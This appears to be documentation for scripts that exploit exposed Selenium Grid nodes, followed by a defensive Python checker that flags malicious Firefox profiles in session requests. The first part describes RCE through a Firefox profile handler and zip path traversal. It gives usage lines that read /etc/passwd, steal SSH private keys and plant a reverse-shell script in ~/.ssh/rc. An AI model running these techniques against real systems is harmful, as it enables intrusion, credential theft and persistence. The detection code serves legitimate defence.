This combines some of the examples below to upload files to, download files from, and execute code on a Selenium node (via the “COMMAND_TYPE” param). RCE currently only works on Linux. To install, copy this to "~/.msf4/modules/exploits/multi/http/" or whatever.
This simply surfs to the "file:" URL and dumps the page contents.
examples/selenium_node_cat.py -h http://selenium-hub.lan:4444/wd/hub -r /etc/passwd
This uses inline HTML to create an inline form with a file upload input. It then sends a local file location into this form. JavaScript in this form embeds the base64 encoded file into the same page. This is then read and decoded by the script, and saved to a local file.
examples/selenium_node_download.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/id_rsa -l ./nodes_rsa
Like the Node Download script, but without processing the file in JavaScript. If the file doesn't exist, send_keys() will throw an exception.
Firefox only. Uses a Firefox Profile (which is just a base64 encoded zip file embedded in a Selenium API hit) to create a custom handler (“application/sh” to /bin/sh in this case). It then base64 encodes some shell commands and uses inline “data:” to pass in commands associated with “application/sh”. Firefox will then create a temp file with the commands and execute it with sh.
Firefox only. Uses a Firefox Profile to set a custom download directory and turn off the "Save as" prompt. Then surfs to inline HTML with an embedded "data:" link which is the encoded file to upload. This link is then clicked on.
examples/selenium_node_upload.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/rc -l ./reverse_shell.sh
Firefox only. Uses a Firefox Profile, which isn't safely unzipped, to write a file to the Node's filesystem.
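
A check a hub operator can run on new-session requests before they reach a node, covering the two Firefox Profile techniques above: it decodes the base64 zip profile and flags entries that would extract outside the profile directory, plus any file mentioning the "application/sh" handler. This is an added example, not one of the original scripts; the function names and sample request are constructed, and `moz:firefoxOptions.profile` and `firefox_profile` are the capability keys assumed to carry the profile.

```python
import base64, io, json, posixpath, zipfile

def find_profiles(node):
    """Yield base64 profile strings found anywhere in a new-session JSON body."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "firefox_profile" and isinstance(value, str):
                yield value
            elif key == "moz:firefoxOptions" and isinstance(value, dict):
                if isinstance(value.get("profile"), str):
                    yield value["profile"]
            else:
                yield from find_profiles(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_profiles(item)

def escapes_root(name):
    """True if a zip entry name would land outside the extraction directory."""
    norm = posixpath.normpath(name.replace("\\", "/"))
    return norm.startswith("/") or norm == ".." or norm.startswith("../")

def audit_session_request(body):
    """Return sorted findings for one new-session request body (JSON text)."""
    findings = set()
    for b64 in find_profiles(json.loads(body)):
        try:
            archive = zipfile.ZipFile(io.BytesIO(base64.b64decode(b64)))
        except (ValueError, zipfile.BadZipFile):
            findings.add("profile is not a valid base64 zip")
            continue
        for info in archive.infolist():
            if escapes_root(info.filename):
                findings.add("path traversal entry: " + info.filename)
            elif not info.is_dir() and b"application/sh" in archive.read(info):
                findings.add("application/sh handler in: " + info.filename)
    return sorted(findings)

def constructed_request():
    """Constructed sample: profile zip with an escaping entry and a handler stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("user.js", "// constructed sample\n")
        z.writestr("../outside.txt", "constructed")
        z.writestr("handlers.json", '{"application/sh": "constructed stub"}')
    profile = base64.b64encode(buf.getvalue()).decode()
    return json.dumps({"capabilities": {"alwaysMatch": {
        "moz:firefoxOptions": {"profile": profile}}}})

print(audit_session_request(constructed_request()))
```

A request with any finding can be rejected at the hub or a reverse proxy in front of it, so the profile never reaches the node's unzip step.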